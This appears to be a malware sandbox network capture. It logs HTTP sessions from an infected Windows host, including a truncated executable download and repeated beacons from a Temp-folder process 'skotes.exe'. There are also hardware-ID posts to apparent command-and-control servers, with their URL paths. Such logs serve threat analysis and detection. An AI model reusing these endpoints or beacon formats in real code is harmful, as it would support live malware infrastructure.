Dec 16, 2024 11:04:58.545592070 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:57 GMT Content-Type: application/octet-stream Content-Length: 1854976 Last-Modified: Mon, 16 Dec 2024 09:29:36 GMT Connection: keep-alive ETag: "675ff300-1c4e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*0k@`k.@M$a$$ $h@.rsrc$x@.idata $z@ +$\|@qlmsectipP~@gcgddbmv k&@.taggant00k",@

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.5	50113	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:52.393189907 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 16, 2024 11:04:53.712963104 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 16, 2024 11:04:53.720798016 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="build"stok------CGHCFBAAAFHJDGCBFIIJ--
Dec 16, 2024 11:04:54.170516968 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50114	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:52.956429005 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:04:54.303076982 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50127	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:56.112552881 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:04:57.362235069 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	50129	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:56.112945080 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:04:57.198549986 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69870 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.5	50138	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:57.487229109 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:04:58.573224068 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 20:27:01 GMT Age: 49077 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:04:58.718992949 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:04:59.033983946 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 20:27:01 GMT Age: 49077 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:04:59.327085972 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:04:59.641537905 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 20:27:01 GMT Age: 49078 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:04:59.688077927 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:00.002599001 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 20:27:01 GMT Age: 49078 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:05:00.653518915 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:00.967905045 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 20:27:01 GMT Age: 49079 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 16, 2024 11:05:10.971613884 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.5	50139	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:57.619102955 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:04:58.704905033 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69871 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:04:59.004492998 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:04:59.319880009 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69872 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:04:59.366512060 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:04:59.680991888 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69872 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:00.276241064 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:00.591007948 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69873 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:10.612296104 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.5	50146	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:59.144335985 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 16, 2024 11:05:00.469707012 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:05:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 16, 2024 11:05:00.505026102 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 2d 2d 0d 0a Data Ascii: ------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="build"stok------EHJDGCBGDBKJKFHIECBA--
Dec 16, 2024 11:05:00.951540947 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:05:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50148	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:59.170300007 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:00.516330957 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50151	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:02.306463957 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:03.630028009 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.5	50152	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:02.639439106 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 16, 2024 11:05:03.970856905 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:05:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 16, 2024 11:05:03.974766016 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="build"stok------FHDHCAAKECFIDHIEBAKF--
Dec 16, 2024 11:05:04.415785074 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:05:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50154	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:05.378273964 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:06.708537102 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50157	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:08.356738091 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:09.686913013 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50159	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:11.463881969 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:12.796087027 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50162	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:14.429313898 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
